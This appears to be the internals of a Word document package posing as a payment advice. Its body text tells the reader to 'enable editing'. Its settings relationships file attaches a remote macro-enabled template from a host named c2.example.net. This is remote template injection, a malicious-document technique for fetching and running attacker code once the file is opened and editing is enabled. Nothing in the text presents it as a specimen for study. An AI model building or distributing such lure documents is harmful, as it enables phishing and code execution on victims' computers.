
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/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Enable editing to view this payment advice.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/settings.xml.rels><?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://c2.example.net/template.dotm" TargetMode="External"/></Relationships>
</file>